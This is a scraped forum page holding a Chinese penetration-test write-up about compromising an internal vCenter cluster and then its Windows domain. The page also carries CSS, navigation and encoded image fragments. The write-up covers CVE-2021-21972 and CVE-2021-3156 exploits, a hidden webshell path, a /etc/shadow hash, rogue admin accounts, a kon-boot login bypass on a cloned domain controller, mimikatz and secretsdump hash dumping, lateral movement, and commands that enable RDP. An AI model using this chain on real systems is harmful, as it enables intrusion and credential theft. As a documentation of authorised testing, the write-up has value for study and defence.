Ztb3InLCdCMmpRendtJywndjJqbXl2YScsJ3JoTHJ1MjAnLCdXT2RkVXROY0w4a3UnLCd1bW9CV1BlRldRTycsJ3pLRHV2TTgnLCdiVzdjUENvRFc0ZScsJ0VmdnRFeGEnLCdXUS9jTjIvY0pDb3YnLCd6MHZ5c3d1JywnbmFOY0lTb3BXN2knLCdBdzlVJywnZGNsZFVXMXMnLCdCZ3ZVejNxJywnQ05yZnVlZScsJ0QySFBCZ3UnLCd5MjlTJywndEt6eEEyRycsJ3ZTa2JXUGlQQ3EnLCd6dzUwJywnRE1XTmZxNCcsJ0ZkYjhtTlcnLCdzbW90ZHVsZE9XJywnV09yNlc0SGZXUlcnLCdXUGhkVlhwY1FTazcnLCdBaHp1cjBpJywneHd6emY4bzQnLCdibWtFczhvZGNhJywneXMxNnFzMCcsJ3ZnakxzME8nLCdyZT
<style>@-moz-keyframes blink{50%{background-color:transparent}}@-webkit-keyframes blink{50%{background-color:transparent}}@keyframes blink{50%{background-color:transparent}}pre code.hljs{overflow-x:auto}.hljs{color:#000}.hljs-comment{color:green}.hljs-string{color:#a31515}.markdown-body{color-scheme:light;--color-prettylights-syntax-comment:#6e7781;--color-prettylights-syntax-constant:#0550ae;--color-prettylights-syntax-entity:#8250df;--color-prettylights-syntax-storage-modifier-import:#24292f;--color-prettylights-syntax-entity-tag:#116329;--color-prettylights-syntax-keyword:#cf222e;--color-prettylights-syntax-string:#0a3069;--color-prettylights-syntax-variable:#953800;--color-prettylights-syntax-brackethighlighter-unmatched:#82071e;--color-prettylights-syntax-invalid-illegal-text:#f6f8fa;--color-prettylights-syntax-invalid-illegal-bg:#82071e;--color-prettylights-syntax-carriage-return-text:#f6f8fa;--color-prettylights-syntax-carriage-return-bg:#cf222e;--color-prettylights-syntax-string-regexp:#116329;--color-prettylights-syntax-markup-list:#3b2300;--color-prettylights-syntax-markup-heading:#0550ae;--color-prettylights-syntax-markup-italic:#24292f;--color-prettylights-syntax-markup-bold:#24292f;--color-prettylights-syntax-markup-deleted-text:#82071e;--color-prettylights-syntax-markup-deleted-bg:#FFEBE9;--color-prettylights-syntax-markup-inserted-text:#116329;--color-prettylights-syntax-markup-inserted-bg:#dafbe1;--color-prettylights-syntax-markup-changed-text:#953800;--color-prettylights-syntax-markup-changed-bg:#ffd8b5;--color-prettylights-syntax-markup-ignored-text:#eaeef2;--color-prettylights-syntax-markup-ignored-bg:#0550ae;--color-prettylights-syntax-meta-diff-range:#8250df;--color-prettylights-syntax-brackethighlighter-angle:#57606a;--color-prettylights-syntax-sublimelinter-gutter-mark:#8c959f;--color-prettylights-syntax-constant-other-reference-link:#0a3069;--color-fg-default:#24292f;--color-fg-muted:#57606a;--color-fg-subtle:#6e7781;--color-canvas-default:#ffffff;--color-canvas-subtle:#f6f8fa;--color-border-default:#d0d7de;--color-border-muted:hsl(210,18%,87%);--color-neutral-muted:rgba(175,184,193,0.2);--color-accent-fg:#0969da;--color-accent-emphasis:#0969da;--color-attention-subtle:#fff8c5;--color-danger-fg:#cf222e}.markdown-body{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;margin:0;color:var(--color-fg-default);background-color:var(--color-canvas-default);font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji";font-size:16px;line-height:1.5;word-wrap:break-word}.markdown-body a{background-color:transparent;color:var(--color-accent-fg);text-decoration:none}.markdown-body a:active,.markdown-body a:hover{outline-width:0}.markdown-body img{border-style:none;max-width:100%;-webkit-box-sizing:content-box;box-sizing:content-box;background-color:var(--color-canvas-default)}.markdown-body ::-webkit-input-placeholder{color:inherit;opacity:0.54}.markdown-body ::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}.markdown-body a:hover{text-decoration:underline}.markdown-body h4{margin-top:24px;margin-bottom:16px;line-height:1.25}.markdown-body h4{font-weight:600;font-size:1em}.markdown-body code{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace}.markdown-body pre{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace;word-wrap:normal}.markdown-body ::-webkit-input-placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body ::placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body::before{display:table;content:""}.markdown-body::after{display:table;clear:both;content:""}.markdown-body>*:first-child{margin-top:0!important}.markdown-body>*:last-child{margin-bottom:0!important}.markdown-body a:not([href]){color:inherit;text-decoration:none}.markdown-body p,.markdown-body pre{margin-top:0;margin-bottom:16px}.markdown-body code{border-radius:6px}.markdown-body pre code{font-size:100%}.markdown-body pre>code{word-break:normal;white-space:pre;backgroun
<style>#md_view{padding:0 20px}#md_view img:hover{cursor:pointer}</style>
<!--[if lt IE 9]>
    <script src="/static/js/html5shiv.min.js"></script>
    <script src="/static/js/respond.min.js"></script>
    <![endif]-->
<style>.hot{z-index:10}</style>
<style>html #layuicss-skinlayercss{display:none;position:absolute;width:1989px}@-webkit-keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);-ms-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1)}}@-webkit-keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);-ms-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);-ms-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);-ms-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);-ms-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);-ms-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);-ms-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);-ms-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes shake{0%,100%{-webkit-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);transform:translateX(10px)}}@keyframes shake{0%,100%{-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);-ms-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);-ms-transform:translateX(10px);transform:translateX(10px)}}@-webkit-keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);transform:scale(.7)}30%{-webkit-transform:scale(1.05);transform:scale(1.05)}0%{-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);-ms-transform:scale(.7);transform:scale(.
<body>
<div class="global-nav mb-50">
 <nav class="navbar navbar-inverse navbar-fixed-top">
 <div class="container nav">
 <div class="visible-xs header-response sf-hidden">
 
 
 
 
 </div>
 <div class="row hidden-xs">
 <div class="col-sm-9 col-md-9 col-lg-9">
 <div class=navbar-header>
 <button type=button class="navbar-toggle collapsed sf-hidden" data-toggle=collapse data-target=#global-navbar>
 
 
 
 
 </button>
 <div class=logo><a class="navbar-brand logo" href=https://forum.butian.net/></a></div>
 </div>
 <div class="collapse navbar-collapse" id=global-navbar>
 <ul class="nav navbar-nav">
 <li><a href=https://forum.butian.net/>首页 <span class=sr-only>(current)</span></a></li>
 
 
 
 <li><a href=https://forum.butian.net/questions>问答</a></li>
 
 
 
 <li><a href=https://forum.butian.net/shop>商城</a></li>
 
 <li><a href=https://forum.butian.net/community>实战攻防技术</a></li>
 <li><a href=https://forum.butian.net/articles>漏洞分析与复现</a>
 <span class=hot>NEW</span>
 </li>
 <li><a href=https://forum.butian.net/movable>活动</a></li>
 <li><a href=https://forum.butian.net/questions/Play>摸鱼办</a>
 
 </li>
 </ul>
 <form role=search id=top-search-form action=https://forum.butian.net/search method=GET class="navbar-form hidden-sm hidden-xs pull-right">
 <span class="btn btn-link"><span class=sr-only>搜索</span><span class="glyphicon glyphicon-search"></span></span>
 <input type=text name=word id=searchBox class=form-control placeholder value>
 </form>
 </div>
 </div>
 
 </div>
 </div>
 </nav>
</div>
<div class="top-alert mt-60 clearfix text-center">
 <!--[if lt IE 9]>
    <div class="alert alert-danger topframe" role="alert">你的浏览器实在<strong>太太太太太太旧了</strong>，放学别走，升级完浏览器再说
        <a target="_blank" class="alert-link" href="http://browsehappy.com">立即升级</a>
    </div>
    <![endif]-->
 
 </div>
<div class=wrap>
 <div class=container>
 <div class="row mt-10">
 <div class="col-xs-12 col-md-9 main" style=width:100%>
 <div class=widget-article>
 <h3 class="title word-wrap">实战|内网中vcenter集群攻击全程实录，学会你也行！</h3>
 <ul class=taglist-inline>
 <li class=tagPopup><a class=tag href=https://forum.butian.net/topic/47>渗透测试</a></li>
 </ul>
 <div class="content mt-10">
 <div class="quote mb-20">
 内网中vcenter集群攻击过程详细记录，学会你也行！
 </div>
 <textarea id=md_view_content style=display:none>#### 前言

最近在做项目的时候，测到了一个部署在内网的存在漏洞的vCenter集群，这不巧了，正好最近在研究这vCenter、域这些集控类设备的打法，于是做了详细记录，有很多碰到的问题和解决办法，大佬勿喷哈哈。

#### vCenter服务器权限获取

内网信息搜集过程中fscan扫描报告显示存在一套vCenter服务器，并且其存在RCE漏洞cve-2021-21972：

```php
[+]https://内网IP  poc-yaml-vmware-vcenter-unauthorized-rce-cve-2021-21972
```

![1.png](https://shs3.b.qianxin.com/attack_forum/2024/12/attach-175fe8c2cc33550bc1dec15ee186ffae8ef2b380.png)

一般而言，进行vCenter攻击首先要确定版本、搜集域名，其中域名获取方式分为两种：一是通过LDAP匿名绑定获取目标域名，二是通过HTTP重定向获取域名，这里采用第二种方式。有个小技巧就是利用密码喷洒规避SSO登录锁定策略可以用来爆破普通用户密码。这里因为存在rce漏洞，是可以直接用exp打下来的。  
我们首先利用CVE-2021-21972漏洞成功获取普通用户权限的webshell，但是无法提权为root  
![2.png](https://shs3.b.qianxin.com/attack_forum/2024/12/attach-67be63ecf481f5a8810bdef102a03164a2008036.png)

然后尝试利用CVE-2021-3156漏洞提升为root权限  
[https://github.com/HynekPetrak/HynekPetrak/blob/master/take\_over\_vcenter\_670.md](https://github.com/HynekPetrak/HynekPetrak/blob/master/take_over_vcenter_670.md)

[https://raw.githubusercontent.com/worawit/CVE-2021-3156/main/exploit\_userspec.py](https://raw.githubusercontent.com/worawit/CVE-2021-3156/main/exploit_userspec.py)

但是第一次执行时遇到错误  
![3.png](https://shs3.b.qianxin.com/attack_forum/2024/12/attach-a38f1a11ecfa74aa6c27b60344a71ba53d0a1e5a.png)

分析后发现是脚本执行到628行打开/dev/null权限不足，直接修改脚本  
![4.png](https://shs3.b.qianxin.com/attack_forum/2024/12/attach-4029c749bc5601bf94b3279d7e9ca65423575493.png)

发现null\_fd并没有什么用，仅仅具有日志记录的作用，于是将其改为1.txt  
![5.png](https://shs3.b.qianxin.com/attack_forum/2024/12/attach-40e78780832c1b46451d0c96a246588fe91c855b.png)

在上次报错的位置再次运行提权脚本，最终创建了一个gg用户（管理员权限，密码gg）,可以su到root账户上，至此提权成功！

再次备份木马到隐藏目录下，访问路径为https://内网IP/idm/..;/update.jsp 重新用哥斯拉连接之，这样就成功获取root权限的webshell  
![6.png](https://shs3.b.qianxin.com/attack_forum/2024/12/attach-4b6076d1b388c9b5e1f8fd3544bf710465bcdba4.png)

查看/etc/shadow获取root密码密文内容

```php
root:$6$QL15TDCu$8HetMyfCTNW6LDS5XKb0yvY7SZqxa55PExH9SKb1pjnzSr/4yVBkOQLAghKwWah3NuqxWIaSFJZ//:0:0:365:7:::
```

这里直接放到在线破解网站发现无法破解，只能先保存下来后面有时间可以破解之，尽管没有破解出明文也是不影响后面的攻击流程的。

#### vCenter控制台权限获取

我们知道vCenter控制台管理了众多的ESXI虚拟机，这些都是业务系统载体，是我们攻击方非常感兴趣的点。为此我们要通过vCenter后台服务器权限来绕过SAML登录，基本思路是：

```php
vCenter SSO：
1. 用户访问vCenter
2. vCenter生成SAML Request，通过浏览器携带参数重定向到Idp地址
3. 用户在Idp地址完成认证
4. Idp生成SAML Response(包含身份断言，签名)，通过自动门提交表单将其发送
给vCenter
5. vCenter 对 SAML Response 的内容进行检验，通过后返回session cookie
6. 用户成功登录
```

为了进一步获取vCenter控制台管理权限，下面利用三好学生脚本vCenterLDAP\_Manage.py按照步骤：获取域控信息-&amp;gt;添加新用户admin-&amp;gt;将新用户加入管理员组中

可以在github上下载三好学生的利用脚本  
[https://github.com/3gstudent/Homework-of-Python/blob/master/vCenterLDAP\_Manage.py](https://github.com/3gstudent/Homework-of-Python/blob/master/vCenterLDAP_Manage.py)

获取域控信息  
![7.png](https://shs3.b.qianxin.com/attack_forum/2024/12/attach-351d3375204185c86030f631b5bcb136e8e26fd2.png)

添加新用户admin  
![8.png](https://shs3.b.qianxin.com/attack_forum/2024/12/attach-e9575a7dcdc0935c9c9fa7cf8728ba63b71d9513.png)

将新用户加入管理员组中  
![9.png](https://shs3.b.qianxin.com/attack_forum/2024/12/attach-51a232697cb7d35c5c53526007a5f71688b2db25.png)

成功添加管理员admin，最终的vcenter管理员账号admin@ZXZ.COM.local/P@ssWord123

最终成功登录vcenter web控制台界面如下：  
![10.png](https://shs3.b.qianxin.com/attack_forum/2024/12/attach-6b75a925a26838e8404e60f28d3cd25dd9444f6e.png)

该vCenter服务器管理68台服务器，存在一个域环境ZXX.COM，锁定域控机器Win2k8R2\_DC。如何拿到该域控制器管理员密码呢？

#### 攻击域控

首先克隆域控所在的虚拟机。通过菜单Actions-&amp;gt;Clone-&amp;gt;Clone to Virtual Machine...命名为Win2K8R2\_Test，然后稍等一会儿就成功克隆该虚拟机。  
![11.png](https://shs3.b.qianxin.com/attack_forum/2024/12/attach-c43038116d83baa234e6700c612fd2269bd5b80a.png)

在网上下载一个启动盘镜像kon\_boot.iso到本地，点击菜单编辑虚拟机，在虚拟机硬件出展开CD/DVD drive 1选择挂载CD/DVD为kon\_boot.iso即可，最后启动克隆虚拟机  
![12.png](https://shs3.b.qianxin.com/attack_forum/2024/12/attach-5f7a48a13231aad0b0deb363a49c218366ce9b73.png)

启动成功后连续按5下shift弹出cmd.exe，添加管理员  
![13.png](https://shs3.b.qianxin.com/attack_forum/2024/12/attach-f5621ad8445d1b057963ac12519af4e92ea5bd58.png)

至此就能够登录该域控克隆主机  
![14.png](https://shs3.b.qianxin.com/attack_forum/2024/12/attach-79e7d577587a5c79de2e866987838ce4a297c9d1.png)

总结一下上述攻击过程为：克隆虚拟机-&amp;gt;挂载CD/DVD为kon\_boot.iso-&amp;gt;利用shift后门弹出cmd.exe并添加管理员用户-&amp;gt;登录域控克隆主机。

#### 域内信息搜集

利用上面步骤中 vcenter服务器攻击最后添加的账号test/Admin@123进入域控克隆主机，进行域内信息搜集：  
![15.png](https://shs3.b.qianxin.com/attack_forum/2024/12/attach-ed19034eed2c814411f9988d05c5f15c0d4a0dd2.png)

利用mimikatz导出所有用户hash，利用CMD5在线破解成功用户ZXX.COM\\backupuser明文密码为admiN@123  
![16.png](https://shs3.b.qianxin.com/attack_forum/2024/12/attach-474b19fbff7557f5829f6ab712e574481cf4c70a.png)

值得注意的是backupuser是域管理员权限，利用账号backupuser/NNN@123登录真正的域控主机  
![17.png](https://shs3.b.qianxin.com/attack_forum/2024/12/attach-f4c7c2ee99ca5abdb171758bd36dc51fc1ce5004.png)

利用impacket工具模块secretsdump再次抓取域内所有用户hash  
![18.png](https://shs3.b.qianxin.com/attack_forum/2024/12/attach-5cc5b4d7094d743300d9d5a5f046cd8ac01206d6.png)

#### 域内横向移动

域内主机A  
通过域管账号backupuser登陆域内主机A，利用横向移动工具Impacket wmiexec+net use进入命令行界面，上传密码抓取工具GetPass\_x64获得明文密码为administrator/TTT@321，也可以上传免杀木马并执行，上线后抓取hash及明文密码  
![21.png](https://shs3.b.qianxin.com/attack_forum/2024/12/attach-06478b2f7994c752b2e0c29b43d106b68f62b1ec.png)

以管理员帐号登录远程桌面后，发现文件夹Share存在大量技术文档  
![22.png](https://shs3.b.qianxin.com/attack_forum/2024/12/attach-7c0095e76a79f98feeaaecb70a6223884f6afdd4.png)

域内主机B  
该主机是一台文件存储服务器，利用横向移动工具Impacket wmiexec+net use上传免杀木马并执行，上线后抓取hash及明文密码  
![23.png](https://shs3.b.qianxin.com/attack_forum/2024/12/attach-bb4c4f243530331efb5bc57a76d2c97c6660623e.png)

开启远程桌面的cmd指令

```php
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
```

防火墙开放端口3389

```php
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
```

开启3389端口后，以管理员帐号成功登录远程桌面  
![24.png](https://shs3.b.qianxin.com/attack_forum/2024/12/attach-8968f8190ff2dde09ecbd6bd92edde6a6e381fca.png)

#### 总结

最后通过攻防两个侧面来谈谈vCenter：  
对于红队而言，vCenter人送外号小域控，拿下vCenter之后，不单单只是获取一台服务器的权限，vCenter中存在的虚拟机以及ESXI主机都有可能成为后续的攻击目标，因此拿下vCenter的价值不亚于域控的价值。  
对于运维管理人员来说要实时关注vCenter操作系统自身的安全漏洞，要确保漏洞能 够及时发现，并能够及时打补丁,以积极应对来自终端层面的攻击威胁。</textarea>
 <div id=layer-photos-demo>
 <div id=md_view><div class=markdown-body><h4 blockindex=0>前言</h4>
<p blockindex=1>最近在做项目的时候，测到了一个部署在内网的存在漏洞的vCenter集群，这不巧了，正好最近在研究这vCenter、域这些集控类设备的打法，于是做了详细记录，有很多碰到的问题和解决办法，大佬勿喷哈哈。</p>
<h4 blockindex=2>vCenter服务器权限获取</h4>
<p blockindex=3>内网信息搜集过程中fscan扫描报告显示存在一套vCenter服务器，并且其存在RCE漏洞cve-2021-21972：</p>
<pre blockindex=4><code class="hljs language-php">[+]https:<span class=hljs-comment>//内网IP  poc-yaml-vmware-vcenter-unauthorized-rce-cve-2021-21972</span>
</code></pre>
<p blockindex=5><img src="data:image/png;base64,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
<p blockindex=6>一般而言，进行vCenter攻击首先要确定版本、搜集域名，其中域名获取方式分为两种：一是通过LDAP匿名绑定获取目标域名，二是通过HTTP重定向获取域名，这里采用第二种方式。有个小技巧就是利用密码喷洒规避SSO登录锁定策略可以用来爆破普通用户密码。这里因为存在rce漏洞，是可以直接用exp打下来的。<br>
我们首先利用CVE-2021-21972漏洞成功获取普通用户权限的webshell，但是无法提权为root<br>
<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAACC0AAAQUCAYAAABX43GpAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAgAElEQVR4nOzd53McZ57g+W9mlgdQ8N4QIAmAAEEveiuKpERKIuW7JXVPd9/s3cxs78XeRtxdxL25P+Be7sbNzkzEzt50z3SvulteJEVJNCIpeu9AeMKbMqgqlK/MfO5FFUAABGjUlLo183wiKgKBSvPkk08++VQ+v3weJZlMClVVkSRJkiRJkiRJkiRJkiRJkiRJkiRJkiRJ+r6YpolFVVU0TftTp0WSJEmSJEmSJEmSJEmSJEmSJEmSJEmSpH9j5BALkiRJkiRJkiRJkiRJkiRJkiRJkiRJkiT9ScigBUmSJEmSJEmSJEmSJEmSJEmSJEmSJEmS/iRk0IIkSZIkSZIkSZIkSZIkSZIkSZIkSZIkSX8SMmhBkiRJkiRJkiRJkiRJkiRJkiRJkiRJkqQ/CRm0IEmSJEmSJEmSJEmSJEmSJEmSJEmSJEnSn4QMWpAkSZIkSZIkSZIkSZIkSZIkSZIkSZIk6U/C8rgLBsJxxieieINhJqIJQEGY5sNXUgAx61+qiqJArstBQV4WRe4ssp22J0+5JEmSJEmSJEmSJEmSJEmSJEmSJEmSJEk/aI8dtDDiD+EZDxGOxjFMgaZpmMbcQQuKAgIFoSgowpwRuKBqKoZukEwkiMYTKEKQ7Sz4ow9EkiRJkiRJkiRJkiRJkiRJkiRJkiRJkqQflscPWvAFSCVT1FfkU5SXg9VqBSE